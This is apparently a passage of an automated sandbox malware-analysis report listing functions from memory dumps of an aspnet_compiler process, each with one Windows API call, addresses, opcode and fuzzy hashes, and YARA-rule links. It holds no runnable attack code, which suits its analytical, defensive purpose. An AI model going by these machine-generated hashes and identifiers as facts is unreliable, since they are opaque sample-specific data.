                                                                                                                                                                        • Opcode ID: d54c4d4ef6bb32a9c22c53f5c7f91601aff2a7233ed02184f7d5e87d59a414d1
                                                                                                                                                                        • Instruction ID: f86a4ab0d06e3cfa54f0ea6c2be856fd8a94335e8ed38e7e11bb55d2f54c7fc2
                                                                                                                                                                        • Opcode Fuzzy Hash: d54c4d4ef6bb32a9c22c53f5c7f91601aff2a7233ed02184f7d5e87d59a414d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F21D1B1504640AFE721DF69CD85B66FBE8EF04320F08846AED899B342D371E444CB75
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42096, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAIoctl.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42111
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ioctl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3041054344-0
                                                                                                                                                                        • Opcode ID: a34a4275ba476df490202006fec06e814b082c848af5b179209f85cb74cc8a35
                                                                                                                                                                        • Instruction ID: 0c18e62e47b68e0f3a77ea68987366aa3f00cc8927b1a834663844f9d50686a8
                                                                                                                                                                        • Opcode Fuzzy Hash: a34a4275ba476df490202006fec06e814b082c848af5b179209f85cb74cc8a35
                                                                                                                                                                        • Instruction Fuzzy Hash: 78217C75100204AFEB22CF55DE84F66FBE8EF08710F04856AEE8A9B651D370E448CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0134AD6A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        • Opcode ID: 30abd7c3d0d68bc8ea0e9e8234b37f36a4c649a878adca7209f1dd3e893211ab
                                                                                                                                                                        • Instruction ID: 60b663c1ff57dd156e54493aee2c81d9619336721dcec9e5718cc3ab0717cb1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 30abd7c3d0d68bc8ea0e9e8234b37f36a4c649a878adca7209f1dd3e893211ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21B3715493805FE7128B29DC55B92BFE8EF46210F0980DAD985CF263D234E808C761
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42324, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RasConnectionNotificationW.RASAPI32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D423B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1402429939-0
                                                                                                                                                                        • Opcode ID: 187f834219524b3de3dee9cbd9fb5f9ada2f49f6b4016917fcaae1263fc624e1
                                                                                                                                                                        • Instruction ID: e03ea57e07dce1fc6abdf3d9c6ad2a1b99d7001f8f17bb805315327c7e91379c
                                                                                                                                                                        • Opcode Fuzzy Hash: 187f834219524b3de3dee9cbd9fb5f9ada2f49f6b4016917fcaae1263fc624e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 3621C2754093846FE7228B24DD45FA6FFB8EF06314F0984DBED849B153D264A908CBB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40F60, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileType.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D40FE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                                                        • Opcode ID: ce639c1c30274c363a9905bf7ff88ef1e40829ef35cdeeda916fc9181bbf8de7
                                                                                                                                                                        • Instruction ID: 58514f82173508359ad2d4daae9a75f89474d965008ce04167d1cc16d19248fc
                                                                                                                                                                        • Opcode Fuzzy Hash: ce639c1c30274c363a9905bf7ff88ef1e40829ef35cdeeda916fc9181bbf8de7
                                                                                                                                                                        • Instruction Fuzzy Hash: 9421D5714083C06FE7128B259D45FB7BFACEF46620F1881DBED859B153C264A848C7B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41102, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • setsockopt.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: setsockopt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3981526788-0
                                                                                                                                                                        • Opcode ID: 67bbf41a9fd39fd87f46e51292a4417e0bb91e8fddbf32ec4c460a3735d07fb7
                                                                                                                                                                        • Instruction ID: 01abdbda5e1cc12aaf0961bd204029a8d27863f37f3b282bd7323110152ae199
                                                                                                                                                                        • Opcode Fuzzy Hash: 67bbf41a9fd39fd87f46e51292a4417e0bb91e8fddbf32ec4c460a3735d07fb7
                                                                                                                                                                        • Instruction Fuzzy Hash: 77219271409380AFEB22CF55DD45FA6FFB8EF45310F08859AE9849B152D334A448CBB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41F97, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ioctlsocket.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42013
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ioctlsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3577187118-0
                                                                                                                                                                        • Opcode ID: 894681b6e3c6d1f9f26052227aa1c581c8b9593d92eb7de337ed50ecb9d6e5e7
                                                                                                                                                                        • Instruction ID: d2b59ecba5473ae5fc2b0cdd7f7896d0335bbb9ce603fcd9ae27470c7d1a4f10
                                                                                                                                                                        • Opcode Fuzzy Hash: 894681b6e3c6d1f9f26052227aa1c581c8b9593d92eb7de337ed50ecb9d6e5e7
                                                                                                                                                                        • Instruction Fuzzy Hash: DC21A1714093846FE722CF24DD45F66FFA8EF46310F0885ABED84AB152C374A548CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134AA8C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 81a52e97744f44e32c503dc4dbe5b2f6b4ce8a1d77a4c15a256dbe5fb24ab83e
                                                                                                                                                                        • Instruction ID: 7b3794ad66a87193ea691b0afb72e650c6dad94259331400ba934a166224d480
                                                                                                                                                                        • Opcode Fuzzy Hash: 81a52e97744f44e32c503dc4dbe5b2f6b4ce8a1d77a4c15a256dbe5fb24ab83e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D218E71640604AFF721CE19CE85F66FBECEF04714F08856AED469B652D360F908CA71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AAFB, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0134AB7E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DisplayNameParse
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3580041360-0
                                                                                                                                                                        • Opcode ID: c587c516244c26f71832ec023628276c4ff0ebc558afc878eb7b3451965a38ac
                                                                                                                                                                        • Instruction ID: 79863a46b7523b46250c867800c9a55c8cbce7b72c47af591bf0381622254c4c
                                                                                                                                                                        • Opcode Fuzzy Hash: c587c516244c26f71832ec023628276c4ff0ebc558afc878eb7b3451965a38ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 3321D5715483806FD3128B25CC41F76BFB8EF87610F0981CAEC848B653D225B915CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41952, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenFileMappingW.KERNELBASE(?,?), ref: 05D419BD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMappingOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1680863896-0
                                                                                                                                                                        • Opcode ID: 00436070553c744482e794b073ac558474bdcf189efdd555aef4b67627dedb43
                                                                                                                                                                        • Instruction ID: dfcadb1f1ab07efa585197189645255c4f2030c434653f9177a8ed4bdc3df569
                                                                                                                                                                        • Opcode Fuzzy Hash: 00436070553c744482e794b073ac558474bdcf189efdd555aef4b67627dedb43
                                                                                                                                                                        • Instruction Fuzzy Hash: 2121A171504240AFE721DF69DD85B6AFBD8EF04320F18846AED859B242D375E448CA76
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AC3B, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134ACA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: bc831cc24b7b7c48d960244f2e510f3a41a49a8f83434519535ba8dac301cb4a
                                                                                                                                                                        • Instruction ID: 9225588e57a77e180cab72f2e86d5d7acf1776f364c8cdc68bec3561794fc454
                                                                                                                                                                        • Opcode Fuzzy Hash: bc831cc24b7b7c48d960244f2e510f3a41a49a8f83434519535ba8dac301cb4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C219D7140E3C06FEB138B259C50692BFB8EF07220F0984DBEC858F163C265A948CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AFD4, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134B040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: c8b2a7decee19f82cc3bb4003b8aa20332709894fb75ec07ead55fdbc88ed0a3
                                                                                                                                                                        • Instruction ID: 83113f801e778f8cb67b508bc9de31646502f693caec44933a667f900e5ad4f6
                                                                                                                                                                        • Opcode Fuzzy Hash: c8b2a7decee19f82cc3bb4003b8aa20332709894fb75ec07ead55fdbc88ed0a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E21A1725093C05FDB138B25DC54692BFA4EF57224F0980DAEC858F263D265A908CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D4139A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 05D41406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 38366605-0
                                                                                                                                                                        • Opcode ID: 657c7df6e96092723e38fd29981bf310021b00cf73bf230105803844fc7434b0
                                                                                                                                                                        • Instruction ID: 4f4e32c20b03a7dd56f7e277b403b5a07a2ef6b68004ed232b6e87443307ddb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 657c7df6e96092723e38fd29981bf310021b00cf73bf230105803844fc7434b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A21CF71500240AFE722DF69DD44B66FBE9EF08310F04845EEE899B252C371A448CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41A52, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                        • Opcode ID: be07cf5ae24effbdd21e6700945ef270a8dfdbbf81b11b23e6ab381996918df2
                                                                                                                                                                        • Instruction ID: 4c7dc991ede0738209595ff4248d4ee67e8654dafc999d6505aa2247821b03fe
                                                                                                                                                                        • Opcode Fuzzy Hash: be07cf5ae24effbdd21e6700945ef270a8dfdbbf81b11b23e6ab381996918df2
                                                                                                                                                                        • Instruction Fuzzy Hash: 6421DE71100240AFE722CF59CE85F6AFFE8EF08320F04845EE9859B241D371A548CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B666, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B6CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3425974696-0
                                                                                                                                                                        • Opcode ID: ff4e14187c1d96016df623354859810d15a2d1588bced04ea82cc0e86d8307ce
                                                                                                                                                                        • Instruction ID: 7b02d868fbeb93519f68b64f446cbd27208d4377fcd046d3e71d7c4791863fcb
                                                                                                                                                                        • Opcode Fuzzy Hash: ff4e14187c1d96016df623354859810d15a2d1588bced04ea82cc0e86d8307ce
                                                                                                                                                                        • Instruction Fuzzy Hash: F211AF71500204AFEB21CF29DE85F6AFBECEF05320F14846AED45DB256D274E4088B71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42426, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05D42489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentOpenUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1571386571-0
                                                                                                                                                                        • Opcode ID: 57e420782ea9752080686fb52556c12d9caa9341e7f4a36a05d398a9cb913002
                                                                                                                                                                        • Instruction ID: 0a8cacb520da0da2b22b4b8c136150ad812e1186d3ff60c3801073c2576b3758
                                                                                                                                                                        • Opcode Fuzzy Hash: 57e420782ea9752080686fb52556c12d9caa9341e7f4a36a05d398a9cb913002
                                                                                                                                                                        • Instruction Fuzzy Hash: FD11D075500244AFFB21DF29DD49F7AFB9CEF04320F14886BED889B242D674A5088BB5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D416B6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41728
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 14aa2c09d86ef095e767e6e1086a93c3ed03fda74ab1a1cfad268c53039de10a
                                                                                                                                                                        • Instruction ID: 1a6a4ac3e27457d3c0a29e1418b662067725b41dc0bfc84e654eae7f4140065f
                                                                                                                                                                        • Opcode Fuzzy Hash: 14aa2c09d86ef095e767e6e1086a93c3ed03fda74ab1a1cfad268c53039de10a
                                                                                                                                                                        • Instruction Fuzzy Hash: EF119D71600204AFE721CF55CD85F67FBACEF04710F04855AED859B652D760E448CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D4262A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42694
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeNotifyValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3933585183-0
                                                                                                                                                                        • Opcode ID: 560ca23ee1d6411517efaa72fcde4ae7fe58949e4cad789cf25e7d1f05690f50
                                                                                                                                                                        • Instruction ID: eb8945fe5445246e2c86c76217ef0a8e33e6fd0eb62d5cd0d99c63ff0702cb82
                                                                                                                                                                        • Opcode Fuzzy Hash: 560ca23ee1d6411517efaa72fcde4ae7fe58949e4cad789cf25e7d1f05690f50
                                                                                                                                                                        • Instruction Fuzzy Hash: E811D371400244AFEB22CF55DE44FAAFBACEF04320F14856BED85AB201D274A408CBB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41ECE, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1995159646-0
                                                                                                                                                                        • Opcode ID: 11023101361a57ad944e987a0ef5fd87b4a72747349d7cfdf9c203d7c6ddeb2e
                                                                                                                                                                        • Instruction ID: fb48c44f69f2d734ae805807043582f264ffc4a74c718237715f2722991889d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 11023101361a57ad944e987a0ef5fd87b4a72747349d7cfdf9c203d7c6ddeb2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6311E672500200AFEB22CF55DE45F6AFBACEF05320F14856AED459B251D370E444CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42276, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAEventSelect.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D422DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventSelect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31538577-0
                                                                                                                                                                        • Opcode ID: 79750fc03cebe9449941f382a0522bde16eb593a92c9a9dcb2b1deb837020da2
                                                                                                                                                                        • Instruction ID: de0af0cc9bcb9679a7c0612c06f3820e29e34f7360154149895d49c12b492b47
                                                                                                                                                                        • Opcode Fuzzy Hash: 79750fc03cebe9449941f382a0522bde16eb593a92c9a9dcb2b1deb837020da2
                                                                                                                                                                        • Instruction Fuzzy Hash: 5111B271400244AFEB12CF55DE89FAAFBACEF49320F14856BED45AB241D674A508CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B57E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B5DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1082081703-0
                                                                                                                                                                        • Opcode ID: 416ed29f48a8cc0621cdaee61a71d69fc3ad57b48ca7616d44a58d3d914e999d
                                                                                                                                                                        • Instruction ID: 33cca1b09ecc6f9399f569265575fe273fc8f87accf8415bbfb8edb1593f4687
                                                                                                                                                                        • Opcode Fuzzy Hash: 416ed29f48a8cc0621cdaee61a71d69fc3ad57b48ca7616d44a58d3d914e999d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9511C871500204AFEB12DF59DE85B66FBDCEF44320F14856AED459B641D774E404CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNELBASE(?), ref: 0134A8A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                        • Opcode ID: 225747ce0dfc150713bf3628e480919a40b2f1fe6973f0c7399ffd3072ef800b
                                                                                                                                                                        • Instruction ID: 9217967ad5692037c5e6450ea994c994206b4c73749b30931bc05b69edbc95d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 225747ce0dfc150713bf3628e480919a40b2f1fe6973f0c7399ffd3072ef800b
                                                                                                                                                                        • Instruction Fuzzy Hash: C521587140A3C45FE7138B258C54652BFB4EF17224F0984DBDCC58F1A3D2696908DB72
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                        Download Yara Rule
